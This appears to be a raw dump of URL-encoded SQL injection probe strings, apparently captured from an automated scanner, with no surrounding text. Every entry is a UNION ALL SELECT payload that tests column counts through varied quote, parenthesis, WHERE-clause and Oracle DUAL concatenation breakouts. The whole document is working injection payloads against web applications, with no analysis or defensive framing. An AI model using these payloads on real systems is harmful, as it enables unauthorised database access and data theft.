-7082%22%29%29%29%20UNION%20ALL%20SELECT%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%23%20AND%20%28%28%28%22LwMe%22%20LIKE%20%22LwMe -8229%22%29%29%29%20UNION%20ALL%20SELECT%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%23%20AND%20%28%28%28%22QPTm%22%20LIKE%20%22QPTm -4278%22%29%29%29%20UNION%20ALL%20SELECT%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%23%20AND%20%28%28%28%22lrYR%22%20LIKE%20%22lrYR -9240%22%29%29%29%20UNION%20ALL%20SELECT%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%23%20AND%20%28%28%28%22SOuX%22%20LIKE%20%22SOuX -6881%22%29%29%29%20UNION%20ALL%20SELECT%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%23%20AND%20%28%28%28%22oyTj%22%20LIKE%20%22oyTj -4981%22%29%29%29%20UNION%20ALL%20SELECT%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%23%20AND%20%28%28%28%22zvNb%22%20LIKE%20%22zvNb -5962%22%20UNION%20ALL%20SELECT%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%2C%209827%23%20AND%20%22SUaj%22%20LIKE%20%22SUaj -7213%22%20UNION%20ALL%20SELECT%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%23%20AND%20%22zYNI%22%20LIKE%20%22zYNI -1048%22%20UNION%20ALL%20SELECT%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%23%20AND%20%22zyoe%22%20LIKE%20%22zyoe -1925%22%20UNION%20ALL%20SELECT%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%2C%205880%23%20AND%20%22frgN%22%20LIKE%20%22frgN -7946%22%20UNION%20ALL%20SELECT%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%23%20AND%20%22jyTN%22%20LIKE%20%22jyTN -1351%22%20UNION%20ALL%20SELECT%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%23%20AND%20%22xiJs%22%20LIKE%20%22xiJs -9188%22%20UNION%20ALL%20SELECT%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%2C%208141%23%20AND%20%22qsQa%22%20LIKE%20%22qsQa -2365%22%20UNION%20ALL%20SELECT%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%23%20AND%20%22nMwB%22%20LIKE%20%22nMwB -3079%22%20UNION%20ALL%20SELECT%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%2C%209009%23%20AND%20%22XYSB%22%20LIKE%20%22XYSB -3503%22%20UNION%20ALL%20SELECT%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%23%20AND%20%22DIXd%22%20LIKE%20%22DIXd -7866%29%20WHERE%204661%3D4661%20UNION%20ALL%20SELECT%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%2C%204661%23 -6788%29%20WHERE%202602%3D2602%20UNION%20ALL%20SELECT%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%2C%202602%23 -5399%29%20WHERE%206097%3D6097%20UNION%20ALL%20SELECT%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%23 -8166%29%20WHERE%203651%3D3651%20UNION%20ALL%20SELECT%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%23 -6104%29%20WHERE%203265%3D3265%20UNION%20ALL%20SELECT%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%23 -1863%29%20WHERE%208123%3D8123%20UNION%20ALL%20SELECT%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%23 -7205%29%20WHERE%205743%3D5743%20UNION%20ALL%20SELECT%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%2C%205743%23 -5505%29%20WHERE%208468%3D8468%20UNION%20ALL%20SELECT%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%2C%208468%23 -3178%29%20WHERE%208989%3D8989%20UNION%20ALL%20SELECT%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%2C%208989%23 -7833%29%20WHERE%208464%3D8464%20UNION%20ALL%20SELECT%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%2C%208464%23 -1386%27%29%20WHERE%204213%3D4213%20UNION%20ALL%20SELECT%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%2C%204213%23 -8784%27%29%20WHERE%203117%3D3117%20UNION%20ALL%20SELECT%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%23 -5814%27%29%20WHERE%204948%3D4948%20UNION%20ALL%20SELECT%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%23 -6032%27%29%20WHERE%205904%3D5904%20UNION%20ALL%20SELECT%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%23 -1152%27%29%20WHERE%206375%3D6375%20UNION%20ALL%20SELECT%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%2C%206375%23 -7749%27%29%20WHERE%206898%3D6898%20UNION%20ALL%20SELECT%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%2C%206898%23 -3180%27%29%20WHERE%203080%3D3080%20UNION%20ALL%20SELECT%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%23 -4789%27%29%20WHERE%204478%3D4478%20UNION%20ALL%20SELECT%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%23 -2955%27%29%20WHERE%204936%3D4936%20UNION%20ALL%20SELECT%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%23 -7604%27%29%20WHERE%205292%3D5292%20UNION%20ALL%20SELECT%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%23 -2748%27%20WHERE%201039%3D1039%20UNION%20ALL%20SELECT%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%2C%201039%23 -2093%27%20WHERE%205542%3D5542%20UNION%20ALL%20SELECT%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%2C%205542%23 -5709%27%20WHERE%202160%3D2160%20UNION%20ALL%20SELECT%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%23 -4671%27%20WHERE%209691%3D9691%20UNION%20ALL%20SELECT%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%23 -5739%27%20WHERE%207263%3D7263%20UNION%20ALL%20SELECT%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%23 -3805%27%20WHERE%208893%3D8893%20UNION%20ALL%20SELECT%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%2C%208893%23 -8481%27%20WHERE%201516%3D1516%20UNION%20ALL%20SELECT%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%2C%201516%23 -6675%27%20WHERE%205368%3D5368%20UNION%20ALL%20SELECT%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%2C%205368%23 -6980%27%20WHERE%205417%3D5417%20UNION%20ALL%20SELECT%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%23 -4944%27%20WHERE%205577%3D5577%20UNION%20ALL%20SELECT%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%23 -3935%22%20WHERE%207507%3D7507%20UNION%20ALL%20SELECT%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%2C%207507%23 -1403%22%20WHERE%204168%3D4168%20UNION%20ALL%20SELECT%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%2C%204168%23 -7846%22%20WHERE%203258%3D3258%20UNION%20ALL%20SELECT%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%23 -7037%22%20WHERE%205829%3D5829%20UNION%20ALL%20SELECT%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%23 -3149%22%20WHERE%201677%3D1677%20UNION%20ALL%20SELECT%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%23 -1724%22%20WHERE%203801%3D3801%20UNION%20ALL%20SELECT%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%23 -2762%22%20WHERE%207904%3D7904%20UNION%20ALL%20SELECT%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%2C%207904%23 -3865%22%20WHERE%202073%3D2073%20UNION%20ALL%20SELECT%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%2C%202073%23 -6188%22%20WHERE%203883%3D3883%20UNION%20ALL%20SELECT%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%2C%203883%23 -3332%22%20WHERE%205325%3D5325%20UNION%20ALL%20SELECT%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%23 -7059%27%20%7C%7C%20%28SELECT%204185%20FROM%20DUAL%20WHERE%209078%3D9078%20UNION%20ALL%20SELECT%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%2C%209078%23%20%29%20%7C%7C%20%27 -6129%27%20%7C%7C%20%28SELECT%203849%20FROM%20DUAL%20WHERE%201534%3D1534%20UNION%20ALL%20SELECT%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%2C%201534%23%20%29%20%7C%7C%20%27 